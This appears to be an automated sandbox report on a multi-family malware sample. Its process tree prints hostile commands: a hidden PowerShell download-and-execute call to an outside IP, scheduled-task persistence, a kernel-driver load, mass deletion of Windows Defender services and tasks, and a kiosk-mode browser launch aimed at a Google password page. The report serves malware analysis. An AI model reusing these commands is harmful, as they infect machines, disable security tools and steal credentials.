\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 KXtPusH.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2476 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 5084 taskkill.exe 2852 taskkill.exe 4520 taskkill.exe 3956 taskkill.exe 2020 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 4624 powershell.exe 4624 powershell.exe 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 3068 rapes.exe 3068 rapes.exe 4344 KXtPusH.exe 4344 KXtPusH.exe 4344 KXtPusH.exe 4344 KXtPusH.exe 4344 KXtPusH.exe 4344 KXtPusH.exe 4344 KXtPusH.exe 3284 8dcf8981c4.exe 3284 8dcf8981c4.exe 3284 8dcf8981c4.exe 3284 8dcf8981c4.exe 3284 8dcf8981c4.exe 3284 8dcf8981c4.exe 2736 74899c17d4.exe 2736 74899c17d4.exe 3448 rapes.exe 3448 rapes.exe 4900 5520df3a73.exe 4900 5520df3a73.exe 3584 08f072925b.exe 3584 08f072925b.exe 3584 08f072925b.exe 3584 08f072925b.exe 3584 08f072925b.exe 3584 08f072925b.exe 2684 f4bcfb7a05.exe 2684 f4bcfb7a05.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 5996 e5367c195a.exe 5996 e5367c195a.exe 1380 rapes.exe 1380 rapes.exe 5996 e5367c195a.exe 5996 e5367c195a.exe 5996 e5367c195a.exe 5236 MSBuild.exe 5236 MSBuild.exe 5236 MSBuild.exe 5236 MSBuild.exe 264 e94476edd2.exe 264 e94476edd2.exe 264 e94476edd2.exe 264 e94476edd2.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5148 UZPt0hR.exe 5148 UZPt0hR.exe 5148 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4624 powershell.exe Token: 33 700 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 700 AUDIODG.EXE Token: SeDebugPrivilege 4344 KXtPusH.exe Token: SeDebugPrivilege 3956 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 5084 taskkill.exe Token: SeDebugPrivilege 2852 taskkill.exe Token: SeDebugPrivilege 4520 taskkill.exe Token: SeDebugPrivilege 1032 firefox.exe Token: SeDebugPrivilege 1032 firefox.exe Token: SeDebugPrivilege 5996 e5367c195a.exe Token: SeDebugPrivilege 2176 powershell.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 1032 firefox.exe 4848 458e534b04.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 4848 458e534b04.exe 1032 firefox.exe 4848 458e534b04.exe 4848 458e534b04.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 1032 firefox.exe 4848 458e534b04.exe 4848 458e534b04.exe 4848 458e534b04.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1032 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3244 wrote to memory of 2636 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3244 wrote to memory of 2636 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3244 wrote to memory of 2636 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 3244 wrote to memory of 2460 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3244 wrote to memory of 2460 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3244 wrote to memory of 2460 3244 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2636 wrote to memory of 1796 2636 cmd.exe 89 PID 2636 wrote to memory of 1796 2636 cmd.exe 89 PID 2636 wrote to memory of 1796 2636 cmd.exe 89 PID 2460 wrote to memory of 4624 2460 mshta.exe 91 PID 2460 wrote to memory of 4624 2460 mshta.exe 91 PID 2460 wrote to memory of 4624 2460 mshta.exe 91 PID 4624 wrote to memory of 1376 4624 powershell.exe 99 PID 4624 wrote to memory of 1376 4624 powershell.exe 99 PID 4624 wrote to memory of 1376 4624 powershell.exe 99 PID 1376 wrote to memory of 3068 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 100 PID 1376 wrote to memory of 3068 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 100 PID 1376 wrote to memory of 3068 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 100 PID 3068 wrote to memory of 4352 3068 rapes.exe 104 PID 3068 wrote to memory of 4352 3068 rapes.exe 104 PID 3068 wrote to memory of 4352 3068 rapes.exe 104 PID 4352 wrote to memory of 2636 4352 apple.exe 105 PID 4352 wrote to memory of 2636 4352 apple.exe 105 PID 4352 wrote to memory of 2636 4352 apple.exe 105 PID 2636 wrote to memory of 452 2636 261.exe 107 PID 2636 wrote to memory of 452 2636 261.exe 107 PID 452 wrote to memory of 4936 452 cmd.exe 109 PID 452 wrote to memory of 4936 452 cmd.exe 109 PID 452 wrote to memory of 4936 452 cmd.exe 109 PID 4936 wrote to memory of 1000 4936 261.exe 110 PID 4936 wrote to memory of 1000 4936 261.exe 110 PID 1000 wrote to memory of 4188 1000 cmd.exe 112 PID 1000 wrote to memory of 4188 1000 cmd.exe 112 PID 1000 wrote to memory of 1332 1000 cmd.exe 113 PID 1000 wrote to memory of 1332 1000 cmd.exe 113 PID 1000 wrote to memory of 2476 1000 cmd.exe 114 PID 1000 wrote to memory of 2476 1000 cmd.exe 114 PID 1000 wrote to memory of 1304 1000 cmd.exe 115 PID 1000 wrote to memory of 1304 1000 cmd.exe 115 PID 1000 wrote to memory of 1348 1000 cmd.exe 116 PID 1000 wrote to memory of 1348 1000 cmd.exe 116 PID 1000 wrote to memory of 3816 1000 cmd.exe 117 PID 1000 wrote to memory of 3816 1000 cmd.exe 117 PID 1000 wrote to memory of 2960 1000 cmd.exe 118 PID 1000 wrote to memory of 2960 1000 cmd.exe 118 PID 1000 wrote to memory of 1004 1000 cmd.exe 119 PID 1000 wrote to memory of 1004 1000 cmd.exe 119 PID 1000 wrote to memory of 3508 1000 cmd.exe 120 PID 1000 wrote to memory of 3508 1000 cmd.exe 120 PID 1000 wrote to memory of 4624 1000 cmd.exe 121 PID 1000 wrote to memory of 4624 1000 cmd.exe 121 PID 1000 wrote to memory of 4128 1000 cmd.exe 122 PID 1000 wrote to memory of 4128 1000 cmd.exe 122 PID 1000 wrote to memory of 4552 1000 cmd.exe 123 PID 1000 wrote to memory of 4552 1000 cmd.exe 123 PID 1000 wrote to memory of 2732 1000 cmd.exe 124 PID 1000 wrote to memory of 2732 1000 cmd.exe 124 PID 1000 wrote to memory of 4260 1000 cmd.exe 125 PID 1000 wrote to memory of 4260 1000 cmd.exe 125 PID 1000 wrote to memory of 3768 1000 cmd.exe 126 PID 1000 wrote to memory of 3768 1000 cmd.exe 126 PID 1000 wrote to memory of 4164 1000 cmd.exe 127 PID 1000 wrote to memory of 4164 1000 cmd.exe 127 PID 1000 wrote to memory of 4772 1000 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 0xGD9mal5qN /tr "mshta C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 0xGD9mal5qN /tr "mshta C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1796
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE"C:\Users\Admin\AppData\Local\TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8194.tmp\8195.tmp\8196.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\825F.tmp\8260.tmp\8261.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4188
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:1332
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:2476
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:1304
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3816
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2960
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:3508
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:4624
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4552
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:2732
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:4260
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:3768
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:4164
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:4772
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:4136
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:3292
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:4500
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:4380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:2216
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:2344
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:1960
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:3240
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1376
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3216
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:4444
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2456
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:4868
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1020
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4568
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:2432
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:800
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:212
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:3580
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:2616
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:4596
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:512
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:2448
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4356
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:3676
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:3044
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:1924
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:1060
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:4736
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:4440
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:1604
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:4112
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:3924
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:1044
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:744
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:1772
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2632
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"6⤵
- Executes dropped EXE
PID:3860
-
-
C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4344 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4928 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1692
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵
- System Location Discovery: System Language Discovery
PID:2616
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 24607⤵
- Program crash
PID:400
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419520101\8dcf8981c4.exe"C:\Users\Admin\AppData\Local\Temp\10419520101\8dcf8981c4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe"C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe"C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\10419550101\08f072925b.exe"C:\Users\Admin\AppData\Local\Temp\10419550101\08f072925b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\10419560101\f4bcfb7a05.exe"C:\Users\Admin\AppData\Local\Temp\10419560101\f4bcfb7a05.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\10419570101\458e534b04.exe"C:\Users\Admin\AppData\Local\Temp\10419570101\458e534b04.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4848 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:4900
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1032 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {da639772-1ed0-43d9-ba1a-477ec92dfe67} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:1344
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {414a6745-b475-4a76-8621-8e16c1d34603} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:3404
-
-
